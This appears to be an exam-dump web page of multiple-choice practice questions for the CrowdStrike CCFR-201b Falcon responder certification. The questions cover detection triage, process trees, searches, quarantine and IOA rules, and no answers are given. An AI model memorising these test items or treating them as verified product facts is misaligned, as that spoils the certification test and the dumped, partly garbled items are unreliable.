Summer Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

CCFR-201b Questions and Answers

Question # 6

What are Event Actions?

A.

Automated searches that can be used to pivot between related events and searches

B.

Pivotable hyperlinks available in a Host Search

C.

Custom event data queries bookmarked by the currently signed in Falcon user

D.

Raw Falcon event data

Full Access
Question # 7

Depending on the subscription level, " Cloudable Events " (standard telemetry) have a specific retention period. What is the minimum period of time that these events are retained?

A.

1 day

B.

7 days

C.

14 days

D.

30 days

Full Access
Question # 8

What happens when you open the full detection details?

A.

Theprocess explorer opens and the detection is removed from the console

B.

The process explorer opens and you ' re able to view the processes and process relationships

C.

The process explorer opens and the detection copies to the clipboard

D.

The process explorer opens and the Event Search query is run for the detection

Full Access
Question # 9

What information is contained within a Process Timeline?

A.

All cloudable process-related events within a given timeframe

B.

All cloudable events for a specific host

C.

Only detection process-related events within a given timeframe

D.

A view of activities on Mac or Linux hosts

Full Access
Question # 10

Refer to the image.

Question # 10

You receive the detection displayed in the image above on a host in your environment.

Assuming you have the correct permissions, where would you navigate to remotely connect to the host and investigate further?

A.

Investigate > Connect to host

B.

View Incident > Connect to host

C.

Actions > Connect to host

Full Access
Question # 11

Executive dashboards provide a high-level view of security. Which of the following CANNOT be seen from the Executive Summary Dashboard?

A.

Detections broken down by Tactic.

B.

A breakdown of Agent Versions across the fleet.

C.

The top 10 hosts with the most detections.

D.

The organization’s current CrowdScore trend.

Full Access
Question # 12

During the triage of a detection involving a newly created persistent task, which specific indicator is most important for a responder to identify the actual intent of the service?

A.

The total CPU usage of the parent process.

B.

The command-line arguments used during the task creation.

C.

The Agent ID (AID) of the host where the detection fired.

D.

The physical location of the endpoint in the office.

Full Access
Question # 13

CrowdStrike provides ' Overwatch Best Practices ' for triaging alerts. According to these guidelines, what is the next step a responder should take immediately after the ' Understand the detection ' step?

A.

Isolate the host from the network.

B.

Review the process tree to understand the origin of the activity.

C.

Perform an OSINT search for the suspicious hash.

D.

Resolve the detection as a True Positive.

Full Access
Question # 14

The MITRE-Based Falcon Detections Framework is a core component of the Falcon UI. What is the primary operational advantage provided by this framework to a Tier 1 responder?

A.

It allows for the automated decryption of files affected by ransomware.

B.

It provides a standardized view of the attack lifecycle to help understand adversary behavior.

C.

It enables the sensor to block kernel-level drivers from unknown publishers.

D.

It provides a real-time count of the total number of files on the endpoint.

Full Access
Question # 15

A security responder is investigating a detection where a low-privileged process attempted to manipulate a system token to gain administrative rights. Within the specific terminology used by the Falcon console, ' Privilege Escalation ' is classified as a:

A.

Technique

B.

Tactic

C.

Objective

D.

Indicator

Full Access
Question # 16

How are processes on the same plane ordered (bottom ' VMTOOLSD.EXE ' to top CMD.EXE ' )?

Question # 16

Question # 16

A.

Process ID (Descending, highest on bottom)

B.

Time started (Descending, most recent on bottom)

C.

Time started (Ascending, most recent on top)

D.

Process ID (Ascending, highest on top)

Full Access
Question # 17

CrowdScore is a metric used to identify the severity of an ongoing incident. What percentage of increase in a CrowdScore is considered a strong indication of a coordinated attack?

A.

10%

B.

20%

C.

50%

D.

100%

Full Access
Question # 18

During a targeted investigation into a potentially compromised internal administrative account, a responder utilizes the User Search functionality within the Investigate menu. The goal is to identify if the account was leveraged to drop or launch unauthorized binaries across multiple systems in the environment. Which specific data category is natively visible in the User Search results to facilitate this check?

A.

Registry Key Operations

B.

Network File Transfer ports

C.

Unique Executables Written and Process Executions

D.

BIOS and Hardware modification logs

Full Access
Question # 19

Responders often need to organize detections to identify trends across the environment. Which of the following is NOT a grouping option currently available on the ' Endpoint Detections ' page?

A.

Grouped by Process

B.

Grouped by Alert

C.

Grouped by File Path

D.

Grouped by Severity

Full Access
Question # 20

A responder is explaining the quarantine process to a system administrator. What happens technically when a file is quarantined by the Falcon sensor?

A.

It is deleted from the disk and a log is sent to the cloud.

B.

It is moved to the CrowdStrike Cloud and removed from the local host immediately.

C.

It is compressed, password protected, and moved to the Quarantine folder on the endpoint.

D.

It is renamed to a .tmp extension and moved to the Windows Recycle Bin.

Full Access
Question # 21

When an organization needs to detect a specific behavior that is unique to their environment, they can create a Custom IOA. Which of the following is NOT required when configuring a custom IOA from scratch?

A.

Selecting a Rule Type (e.g., Process Creation).

B.

Specifying the Severity level of the resulting detection.

C.

Assigning a specific host group to the IOA rule at the time of creation.

D.

Providing a unique name for the rule.

Full Access
Question # 22

The primary purpose for running a Hash Search is to:

A.

determine any network connections

B.

review the processes involved with a detection

C.

determine the origin of the detection

D.

review information surrounding a hash ' s related activity

Full Access
Question # 23

After pivoting to an event search from a detection, you locate the ProcessRollup2 event. Which two field values are you required to obtain to perform a Process Timeline search so you can determine what the process was doing?

A.

SHA256 and TargetProcessld_decimal

B.

SHA256 and ParentProcessld_decimal

C.

aid and ParentProcessld_decimal

D.

aid and TargetProcessld_decimal

Full Access
Question # 24

When training a new team member on how to interpret Falcon telemetry, a senior responder explains the definition of a ' Tactic ' . Which of the following sentences best captures the technical definition of a Tactic in this context?

A.

It represents the specific software version or exploit code used to crash a service.

B.

It is the adversary ' s tactical goal: the fundamental reason for performing a specific action.

C.

It is the unique cryptographic hash associated with a malicious file discovered on disk.

D.

It is the specific command-line string used to execute a PowerShell script.

Full Access
Question # 25

Which tool or search type is recommended as the " best search " to use when performing the " Examine what ' s normal for this system " step in an investigation?

A.

User Search

B.

Host Search

C.

Hash Search

D.

IP Search

Full Access
Question # 26

After an investigation, the following malicious artifacts have been identified:

    C:\Users*\AppData\iamnotmalware.exe

    C:\Users*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iamnotmalware.lnk

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamnotmalware_really

What method will remove all associated artifacts from hosts that trigger future related detections?

A.

Create a Quarantine Rule that will quarantine all identified artifacts across the entire environment

B.

Create Custom IOA rules to prevent the execution of these artifacts

C.

Create a workflow to trigger on a new endpoint detection, query the telemetry data of the endpoint for known artifacts, and select Remove All Associated Artifacts as an action

D.

Create a workflow to trigger on a new endpoint detection, conditions that match the detection, and as an action a PowerShell script to kill associated processes and remove all artifacts

Full Access
Question # 27

What types of events are returned by a Process Timeline?

A.

Only detection events

B.

All cloudable events

C.

Only process events

D.

Only network events

Full Access
Question # 28

Refer to Image:

Question # 28

You are investigating a network connection in event search.

Which option next to the raw event data should you select to pivot to a graphical representation for all the processes related to the network connection event?

A.

Inspect

B.

Show Responsible Process Data

C.

Draw Process Explorer

D.

Show Associated Event Data

Full Access
Question # 29

A responder needs to view a high-level overview of the environment ' s security posture. Where can they find the ' Activity Dashboard ' ?

A.

Investigate > Activity Dashboard

B.

Endpoint Security > Monitor > Activity Dashboard

C.

Configuration > General > Activity Dashboard

D.

Support > Analytics > Activity Dashboard

Full Access
Question # 30

Which of the following tactic and technique combinations is sourced from MITRE ATT AND CK information?

A.

Falcon Intel via Intelligence Indicator - Domain

B.

Machine Learning via Cloud-Based ML

C.

Malware via PUP

D.

Credential Access via OS Credential Dumping

Full Access
Question # 31

In the full detection tree view, icons provide visual cues about the telemetry. What does the specific icon representing a ' Falcon ' (blue bird) indicate to the responder?

A.

The file has been successfully quarantined by the sensor.

B.

There is related Intelligence (Intel) data available for this detection.

C.

The process has been identified as a legitimate system file.

D.

The host is currently undergoing a remote live response session.

Full Access
Question # 32

During the incident response process, a responder must update the status of a detection. Which of the following options is NOT a valid detection status recognized by the Falcon console?

A.

New

B.

Complete

C.

In Progress

D.

True Positive

Full Access
Question # 33

The User Search results are organized into several categories. Which of the following is NOT a sub-heading in the User Search?

A.

User Logons

B.

Unique Executables Written

C.

Admin tool usage

D.

Network Connections

Full Access
Question # 34

What happens when a hash is allowlisted?

A.

Execution is prevented, but detection alerts are suppressed

B.

Execution is allowed on all hosts, including all other Falcon customers

C.

The hash is submitted for approval to be allowed to execute once confirmed by Falcon specialists

D.

Execution is allowed on all hosts that fall under the organization ' s CID

Full Access
Question # 35

From the Detections page, how can you view ' in-progress ' detections assigned to Falcon Analyst Alex?

A.

Filter on ' Analyst: Alex '

B.

Alex does not have the correct role permissions as a Falcon Analyst to be assigned detections

C.

Filter on ' Hostname: Alex ' and ' Status: In-Progress '

D.

Filter on ' Status: In-Progress ' and ' Assigned-to: Alex*

Full Access
Question # 36

You found a list of SHA256 hashes in an intelligence report and search for them using the Hash Execution Search. What can be determined from the results?

A.

Identifies a detailed list of all process executions for the specified hashes

B.

Identifies hosts that loaded or executed the specified hashes

C.

Identifies users associated with the specified hashes

D.

Identifies detections related to the specified hashes

Full Access
Question # 37

Which of the following sentences best describes the technical visibility provided by the ' Host Timeline ' view?

A.

A list of every time a user has logged in or out of the machine.

B.

Every host-relevant event (Process, File, Registry, Network) recorded in a given timeframe.

C.

A history of every hardware change or driver update on the endpoint.

D.

A log of every time the Falcon sensor was updated or restarted.

Full Access
Question # 38

A responder is unsure about the difference between ' Detection ' and ' Prevention ' settings. Where can they find information about Detection and Prevention Policies?

A.

On the public CrowdStrike blog.

B.

In the Support page under the Docs section.

C.

By clicking the ' About ' button in the user profile.

D.

In the training videos on the main Dashboard.

Full Access
Question # 39

What is an advantage of using a Process Timeline?

A.

Process related events can be filtered to display specific event types

B.

Suspicious processes are color-coded based on their frequency and legitimacy over time

C.

Processes responsible for spikes in CPU performance are displayed overtime

D.

A visual representation of Parent-Child and Sibling process relationships is provided

Full Access
Question # 40

While examining the ' Process Details ' sidebar of a detection, a responder sees the following icons: " 25 Network Operations " and " 277 Disk Operations " . What does this contextual data represent?

A.

The percentage of the CPU being consumed by the network and disk.

B.

The specific number of telemetry events recorded for network and disk activity by that process.

C.

The total size in megabytes of the data sent over the network and written to disk.

D.

The number of other hosts that have seen similar network and disk activity.

Full Access
Question # 41

The Falcon sensor can take several automated actions to protect an endpoint. Which of the following is NOT an action that Falcon takes upon detection?

A.

Process Termination

B.

File Quarantine

C.

Process Restart

D.

Network Isolation

Full Access
Question # 42

Evaluate the following process tree observed in a detection:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe

Based on the parent-child relationships, which entry source is most likely?

A.

A remote service exploitation targeting a system process.

B.

A phishing attack where the user executed a malicious file from the desktop.

C.

A scheduled task running under the SYSTEM account.

D.

A supply chain attack targeting the Windows Boot manager.

Full Access
Question # 43

During the configuration of a new IOA rule, the administrator must decide what action the sensor should take. Which of the following is NOT a valid IOA rule action?

A.

Monitor

B.

Block

C.

No Action

D.

Kill Process

Full Access
Question # 44

From a detection, what is the fastest way to see children and sibling process information?

A.

Select the Event Search option. Then from the Event Actions, select Show Associated Event Data (From TargetProcessld_decimal)

B.

Select Full Detection Details from the detection

C.

Right-click the process and select " Follow Process Chain "

D.

Select the Process Timeline feature, enter the AID. Target Process ID, and Parent Process ID

Full Access
Question # 45

What is the difference between Managed and Unmanaged Neighbors in the Falcon console?

A.

A managed neighbor is currently network contained and an unmanaged neighbor is uncontained

B.

A managed neighbor has an installed and provisioned sensor

C.

An unmanaged neighbor is in a segmented area of the network

D.

A managed sensor has an active prevention policy

Full Access
Question # 46

A responder needs to find a specific sequence of network connections that did not trigger a detection. Which search tool allows them to search for anything within the raw telemetry?

A.

Host Search

B.

Event Search

C.

Hash Search

D.

User Search

Full Access
Question # 47

Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?

A.

Machine Learning

B.

Behavioral

C.

Intelligence

D.

Custom IOA

Full Access
Question # 48

Refer to the image.

Question # 48

What does the arrowed line indicate?

A.

PowerShell spawned Notepad.exe, which injected a thread back to Excel.exe

B.

The thread injection was considered a Medium severity injection

C.

PowerShell spawned Notepad.exe, which injected a thread back to PowerShell

D.

Notepad.exe injected itself into Excel.exe

Full Access
Question # 49

Aside from a Process Timeline or Event Search, how do you export process event data from a detection in .CSV format?

A.

You can ' t export detailed event data from a detection, you have to use the Process Timeline or an Event Search

B.

In Full Detection Details, you expand the nodes of the process tree you wish to expand and then click the " Export Process Events " button

C.

In Full Detection Details, you choose the " View Process Activity " option and then export from that view

D.

From the Detections Dashboard, you right-click the event type you wish to export and choose CSV. JSON or XML

Full Access
Question # 50

An analyst needs to perform local sandbox analysis on a malicious file. When they download a quarantined file from the Falcon UI, what is the file format and the default password?

A.

.zip, password: crowdstrike

B.

.7-zip, password: infected

C.

.rar, password: malware

D.

.exe, no password

Full Access
Question # 51

A responder needs to categorize an incident based on the high-level goals of the attacker. Which of the following lists correctly identifies the " Objectives " as they are natively defined and used within the Falcon platform?

A.

Explore, Keep Access, Gain Access, Falcon Detection Method, Contact Controlled systems, Follow Through

B.

Reconnaissance, Delivery, Weaponization, Exploitation, Installation, Command and Control

C.

Identify, Protect, Detect, Respond, Recover, Lessons Learned

D.

Triage, Containment, Remediation, Eradication, Reporting, Recovery

Full Access
Question # 52

How long does detection data remain in the CrowdStrike Cloud before purging begins?

A.

90 Days

B.

45 Days

C.

30 Days

D.

14 Days

Full Access
Question # 53

Refer to the image.

Question # 53

In the Full Detection View while viewing the Process Tree you see an attack outlined as in the image above.

Based on what you see, what happened during the attack?

A.

The attacker launched a command prompt, renamed binaries, executed malware, and prepared exfiltration

B.

The attacker launched a command prompt to establish a reverse shell to grant remote code execution capabilities

C.

The attacker executed malware, renamed binaries, prepared exfiltration, and deleted backups to prevent recovery

D.

The attacker launched a command prompt, enumerated the host, created persistence, and deleted backups to prevent recovery

Full Access
Question # 54

To understand how a threat moved on a system, a responder must know the role of common processes. Which of the following statements best describes the standard functionality of explorer.exe?

A.

It is a system process responsible for the Local Security Authority subsystem.

B.

It is the primary process responsible for the File Explorer UI and the user ' s desktop environment.

C.

It is the Windows Command Processor used for executing batch files.

D.

It is the service control manager that handles the starting of background tasks.

Full Access
Question # 55

While most searches are accessible from a detection, some require a manual jump. Which search is not available as a direct pivot from a detection?

A.

Host Search

B.

Hash Search

C.

User Search

D.

IP Search

Full Access
Question # 56

Host Search is a powerful investigation tool. From which of the following sources is a responder most likely to pivot directly to a Host Search?

A.

A global intelligence report about a new adversary.

B.

A specific detection that occurred on a particular host.

C.

The main settings menu of the Falcon console.

D.

The help documentation in the Support portal.

Full Access
Question # 57

You receive an email from a third-party vendor that one of their services is compromised,thevendor names a specific IP address that the compromised service was using. Where would you input this indicator to find any activity related to this IP address?

A.

IP Addresses

B.

Remote or Network Logon Activity

C.

Remote Access Graph

D.

Hash Executions

Full Access
Question # 58

Which Executive Summary dashboard item indicates sensors running with unsupported versions?

A.

Detections by Severity

B.

Inactive Sensors

C.

Sensors in RFM

D.

Active Sensors

Full Access
Question # 59

CrowdStrike supports various deployment types. What is a ' POD sensor ' ?

A.

A sensor specifically designed for mobile devices (iOS/Android).

B.

A sensor that is installed directly on a Kubernetes or Docker host to monitor containers.

C.

A legacy sensor used only for disconnected or air-gapped systems.

D.

A physical appliance that sits on the network to monitor traffic.

Full Access